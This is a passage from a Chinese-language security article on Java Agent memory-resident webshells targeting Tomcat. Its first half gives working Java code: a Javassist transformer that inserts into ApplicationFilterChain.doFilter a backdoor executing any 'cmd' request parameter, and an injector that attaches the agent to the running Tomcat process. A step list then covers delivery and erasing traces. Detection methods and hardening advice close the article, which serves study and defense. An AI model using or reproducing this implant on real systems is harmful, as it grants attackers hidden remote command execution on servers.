ProtectionDomain protectionDomain,<\/span> <\/span><\/span> byte<\/span>[]<\/span> classfileBuffer)<\/span> throws<\/span> IllegalClassFormatException {<\/span> <\/span><\/span> if<\/span> (<\/span>className.<\/span>equals<\/span>(<\/span>"org\/apache\/catalina\/core\/ApplicationFilterChain"<\/span>))<\/span> {<\/span> <\/span><\/span> ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span> <\/span><\/span> pool.<\/span>appendClassPath<\/span>(<\/span>new<\/span> LoaderClassPath(<\/span>loader));<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> CtClass cc =<\/span> pool.<\/span>makeClass<\/span>(<\/span>new<\/span> ByteArrayInputStream(<\/span>classfileBuffer));<\/span> <\/span><\/span> CtMethod doFilter =<\/span> cc.<\/span>getDeclaredMethod<\/span>(<\/span>"doFilter"<\/span>);<\/span> <\/span><\/span> doFilter.<\/span>insertBefore<\/span>(<\/span>"{"<\/span> +<\/span> <\/span><\/span> "String cmd = request.getParameter(\"cmd\");\n"<\/span> +<\/span> <\/span><\/span> "if (cmd != null) {\n"<\/span> +<\/span> <\/span><\/span> " try {\n"<\/span> +<\/span> <\/span><\/span> " Process proc = Runtime.getRuntime().exec(cmd);\n"<\/span> +<\/span> <\/span><\/span> " java.io.InputStream in = proc.getInputStream();\n"<\/span> +<\/span> <\/span><\/span> " java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(in));\n"<\/span> +<\/span> <\/span><\/span> " response.setContentType(\"text\/html\");\n"<\/span> +<\/span> <\/span><\/span> " String line;\n"<\/span> +<\/span> <\/span><\/span> " java.io.PrintWriter out = response.getWriter();\n"<\/span> +<\/span> <\/span><\/span> " while ((line = br.readLine()) != null) {\n"<\/span> +<\/span> <\/span><\/span> " out.println(line);\n"<\/span> +<\/span> <\/span><\/span> " out.flush();\n"<\/span> +<\/span> <\/span><\/span> " }\n"<\/span> +<\/span> <\/span><\/span> " out.close();\n"<\/span> +<\/span> <\/span><\/span> " } catch (Exception e) {\n"<\/span> +<\/span> <\/span><\/span> " throw new RuntimeException(e);\n"<\/span> +<\/span> <\/span><\/span> " }\n"<\/span> +<\/span> <\/span><\/span> "}"<\/span> +<\/span> <\/span><\/span> "}"<\/span>);<\/span> <\/span><\/span> return<\/span> cc.<\/span>toBytecode<\/span>();<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>进程查找和注入：<\/strong><\/p> import<\/span> com.sun.tools.attach.VirtualMachine;<\/span> <\/span><\/span>import<\/span> java.io.BufferedReader;<\/span> <\/span><\/span>import<\/span> java.io.InputStreamReader;<\/span> <\/span><\/span>import<\/span> java.security.ProtectionDomain;<\/span> <\/span><\/span>import<\/span> java.net.URL;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> Injector<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> String pid =<\/span> getPID(<\/span>"org.apache.catalina.startup.Bootstrap"<\/span>);<\/span> <\/span><\/span> String jar =<\/span> getJar(<\/span>Injector.<\/span>class<\/span>);<\/span> <\/span><\/span> <\/span><\/span> VirtualMachine vm =<\/span> VirtualMachine.<\/span>attach<\/span>(<\/span>pid);<\/span> <\/span><\/span> vm.<\/span>loadAgent<\/span>(<\/span>jar);<\/span> <\/span><\/span> vm.<\/span>detach<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> String getJar<\/span>(<\/span>Class<?><\/span> clazz)<\/span> {<\/span> <\/span><\/span> ProtectionDomain protectionDomain =<\/span> clazz.<\/span>getProtectionDomain<\/span>();<\/span> <\/span><\/span> URL location =<\/span> protectionDomain.<\/span>getCodeSource<\/span>().<\/span>getLocation<\/span>();<\/span> <\/span><\/span> String path =<\/span> location.<\/span>getPath<\/span>();<\/span> <\/span><\/span> if<\/span> (<\/span>System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"win"<\/span>)<\/span> &&<\/span> path.<\/span>startsWith<\/span>(<\/span>"\/"<\/span>))<\/span> {<\/span> <\/span><\/span> path =<\/span> path.<\/span>substring<\/span>(<\/span>1<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> path;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> String getPID<\/span>(<\/span>String className)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Process process =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"jps -l"<\/span>);<\/span> <\/span><\/span> BufferedReader reader =<\/span> new<\/span> BufferedReader(<\/span>new<\/span> InputStreamReader(<\/span>process.<\/span>getInputStream<\/span>()));<\/span> <\/span><\/span> String line;<\/span> <\/span><\/span> while<\/span> ((<\/span>line =<\/span> reader.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>line.<\/span>contains<\/span>(<\/span>className))<\/span> {<\/span> <\/span><\/span> return<\/span> line.<\/span>split<\/span>(<\/span>" "<\/span>)[<\/span>0<\/span>];<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>4.4 实际攻击流程<\/h3> 获取目标进程PID<\/strong>：通过漏洞（如Spring Boot Actuator、JMX未授权访问）或系统命令执行获得<\/li> 上传恶意Agent JAR<\/strong>：利用文件上传漏洞或直接通过内存写入<\/li> 调用Attach API加载Agent<\/strong>：通过反射调用sun.tools.attach.VirtualMachineImpl<\/code><\/li> Agent执行字节码插桩<\/strong>：在关键类中插入后门逻辑<\/li> 清除痕迹<\/strong>：删除临时JAR文件，从内存中抹去Agent相关类引用<\/li> <\/ol> 五、检测与防御<\/h2> 5.1 检测手段<\/h3> 技术检测：<\/strong><\/p> 监控Attach行为<\/strong>：记录com.sun.tools.attach<\/code>相关调用<\/li> 检查Instrumentation实例<\/strong>：通过反射查看是否有非预期的ClassFileTransformer<\/code><\/li> 字节码完整性校验<\/strong>：对比关键类的当前字节码与原始JAR中是否一致<\/li> 安全产品监控<\/strong>：使用OpenRASP、青藤云、奇安信等支持Agent行为监控的产品<\/li> <\/ul> 检测代码示例：<\/strong><\/p> \/\/ 检查已注册的ClassFileTransformer <\/span><\/span><\/span><\/span>Instrumentation inst =<\/span> getInstrumentationInstance();<\/span> <\/span><\/span>for<\/span> (<\/span>ClassFileTransformer transformer :<\/span> inst.<\/span>getAllTransformers<\/span>())<\/span> {<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Transformer: "<\/span> +<\/span> transformer.<\/span>getClass<\/span>().<\/span>getName<\/span>());<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>5.2 防御建议<\/h3> 系统层面：<\/strong><\/p> 禁用Attach机制：-Djdk.attach.allowAttachSelf=false<\/code>、-XX:+DisableAttachMechanism<\/code><\/li> 最小权限原则：应用不要以root或高权限用户运行<\/li> 启用SecurityManager（旧系统）<\/li> <\/ul> 应用层面：<\/strong><\/p> 限制外部输入：防止反序列化、表达式注入等漏洞<\/li> 定期内存快照分析：使用MAT、JProfiler等工具排查异常类或Transformer<\/li> 代码审计：检查敏感类的字节码完整性<\/li> <\/ul> 运维层面：<\/strong><\/p> 网络隔离：限制不必要的网络访问<\/li> 进程监控：监控异常的JVM Attach操作<\/li> 安全更新：及时更新JDK和中间件版本<\/li> <\/ul> 六、总结<\/h2> Java Agent本身是合法且强大的开发工具，广泛应用于APM、调试等领域。Agent内存马是其被滥用于攻击的产物，代表了Java Web攻击技术的高级形态。<\/p> 技术特点：<\/strong><\/p> 高隐蔽性：恶意代码直接注入到合法类中<\/li> 持久化：存活于内存中，重启后消失<\/li> 绕过传统检测：不依赖Filter\/Servlet注册表<\/li> <\/ul> 防御关键：<\/strong><\/p> 纵深防御：结合漏洞治理 + 行为监控 + 运行时保护<\/li> 最小权限：严格控制JVM运行权限<\/li> 持续监控：建立完善的运行时安全监控体系<\/li> <\/ul> 通过深入理解Java Agent机制和内存马实现原理，才能有效防御这类高级攻击手段，保障Java应用安全。<\/p>